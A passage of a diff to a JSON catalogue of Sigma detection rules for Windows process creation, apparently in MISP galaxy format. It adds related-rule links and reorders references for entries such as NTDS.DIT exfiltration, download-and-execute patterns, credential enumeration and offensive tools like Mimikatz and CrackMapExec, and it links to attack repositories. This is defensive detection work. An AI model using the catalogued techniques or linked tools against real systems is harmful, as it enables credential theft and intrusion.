"https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" ], "tags": [ @@ -51567,6 +66457,15 @@ "attack.t1614.001" ] }, + "related": [ + { + "dest-uuid": "c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", "value": "CHCP CodePage Locale Lookup" }, @@ -51583,8 +66482,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" ], "tags": [ @@ -51595,6 +66494,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "value": "Lolbins Process Creation with WmiPrvse" }, @@ -51622,6 +66544,29 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "value": "RedMimicry Winnti Playbook Execute" }, @@ -51647,6 +66592,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "value": "Netsh Allow Group Policy on Microsoft Defender Firewall" }, @@ -51663,10 +66617,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/bohops/status/1276357235954909188?s=12", - "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://twitter.com/nas_bench/status/1535322450858233858", + "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", + "https://twitter.com/bohops/status/1276357235954909188?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" ], "tags": [ @@ -51690,10 +66644,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://twitter.com/lefterispan/status/1286259016436514816", - "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml" ], "tags": [ @@ -51701,6 +66655,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "value": "Suspicious AgentExecutor PowerShell Execution" }, @@ -51727,6 +66690,15 @@ "attack.t1220" ] }, + "related": [ + { + "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "value": "XSL Script Processing" }, @@ -51751,6 +66723,15 @@ "attack.t1216.001" ] }, + "related": [ + { + "dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "value": "Pubprn.vbs Proxy Execution" }, @@ -51800,6 +66781,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "value": "Use of Forfiles For Execution" }, @@ -51849,6 +66839,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "727454c0-d851-48b0-8b89-385611ab0704", "value": "Lolbin Unregmp2.exe Use As Proxy" }, @@ -51866,12 +66865,12 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://github.com/zcgonvh/NTDSDumpEx", - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], "tags": [ @@ -51879,6 +66878,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "value": "Suspicious Process Patterns NTDS.DIT Exfil" }, @@ -51895,9 +66903,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" ], "tags": [ @@ -51905,6 +66913,15 @@ "attack.t1005" ] }, + "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", "value": "Conti Backup Database" }, @@ -51921,13 +66938,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", "https://www.cobaltstrike.com/help-opsec", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", - "https://twitter.com/CyberRaiju/status/1251492025678983169", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", + "https://twitter.com/CyberRaiju/status/1251492025678983169", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" ], "tags": [ @@ -51935,6 +66952,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments" }, @@ -51959,6 +66985,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", "value": "BlueMashroom DLL Load" }, @@ -51976,9 +67011,9 @@ "logsource.product": "windows", "refs": [ "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" ], "tags": "No established tags" @@ -51987,7 +67022,7 @@ "value": "CrackMapExec Command Line Flags" }, { - "description": "Use \">\" to redicrect information in commandline", + "description": "Detects use of redirection character \">\" to redicrect information in commandline", "meta": { "author": "frack113", "creation_date": "2022/01/22", @@ -52031,6 +67066,15 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", "value": "Cscript Visual Basic Script Execution" }, @@ -52047,8 +67091,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" ], "tags": [ @@ -52056,6 +67100,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", "value": "Suspicious PowerShell Download and Execute Pattern" }, @@ -52081,6 +67134,15 @@ "attack.t1555" ] }, + "related": [ + { + "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", "value": "SecurityXploded Tool" }, @@ -52098,9 +67160,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" ], "tags": [ @@ -52133,6 +67195,15 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "value": "SysmonEOP Hack Tool" }, @@ -52157,6 +67228,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "value": "Python Spawning Pretty TTY on Windows" }, @@ -52173,8 +67253,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" ], "tags": [ @@ -52182,6 +67262,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", "value": "Replace.exe Usage" }, @@ -52206,6 +67295,15 @@ "attack.t1070.005" ] }, + "related": [ + { + "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "value": "Mounted Share Deleted" }, @@ -52233,6 +67331,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", "value": "Indirect Command Execution By Program Compatibility Wizard" }, @@ -52259,6 +67366,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", "value": "Invoke-Obfuscation Via Stdin" }, @@ -52283,6 +67399,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", "value": "Suspicious aspnet_compiler.exe Execution" }, @@ -52299,8 +67424,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hvs-consulting.de/lazarus-report/", "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://www.hvs-consulting.de/lazarus-report/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" ], "tags": [ @@ -52309,6 +67434,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", "value": "Lazarus Loaders" }, @@ -52325,9 +67459,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", "https://www.joeware.net/freetools/tools/adfind/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" ], "tags": [ @@ -52373,8 +67507,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/child-processes/", "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", + "https://redcanary.com/blog/child-processes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" ], "tags": [ @@ -52382,6 +67516,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "value": "Script Event Consumer Spawning Process" }, @@ -52406,6 +67549,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", "value": "Suspicious Get Local Groups Information with WMIC" }, @@ -52422,8 +67574,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" ], "tags": [ @@ -52431,6 +67583,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", "value": "WMI Remote Command Execution" }, @@ -52447,8 +67608,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/ch2sh/Jlaive", "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://github.com/ch2sh/Jlaive", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" ], "tags": [ @@ -52456,6 +67617,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", "value": "Jlaive Usage For Assembly Execution In-Memory" }, @@ -52473,8 +67643,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" ], "tags": [ @@ -52509,6 +67679,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "value": "CsExec Remote Execution Tool Usage" }, @@ -52525,8 +67711,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" ], @@ -52559,6 +67745,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "value": "Potential Download/Upload Activity Using Type Command" }, @@ -52584,6 +67779,15 @@ "attack.t1218.005" ] }, + "related": [ + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", "value": "Mshta Remotely Hosted HTA File Execution" }, @@ -52600,9 +67804,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" ], "tags": [ @@ -52628,8 +67832,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" @@ -52639,6 +67843,15 @@ "attack.t1552.002" ] }, + "related": [ + { + "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", "value": "Enumeration for 3rd Party Creds From CLI" }, @@ -52684,6 +67897,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", "value": "Winrar Execution in Non-Standard Folder" }, @@ -52708,6 +67930,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", "value": "Suspicious Extrac32 Execution" }, @@ -52724,8 +67955,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/sensepost/ruler", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://github.com/sensepost/ruler", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" ], "tags": [ @@ -52734,6 +67965,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", "value": "Suspicious Execution from Outlook" }, @@ -52797,17 +68044,19 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://adsecurity.org/?p=2921", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/calebstewart/CVE-2021-1675", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://adsecurity.org/?p=2921", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/samratashok/nishang", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml" ], "tags": [ @@ -52823,6 +68072,43 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02030f2f-6199-49ec-b258-ea71b07e03dc", "value": "Malicious PowerShell Commandlets - ProcessCreation" }, @@ -52847,6 +68133,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "204b17ae-4007-471b-917b-b917b315c5db", "value": "Suspicious Del in CommandLine" }, @@ -52894,6 +68189,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + 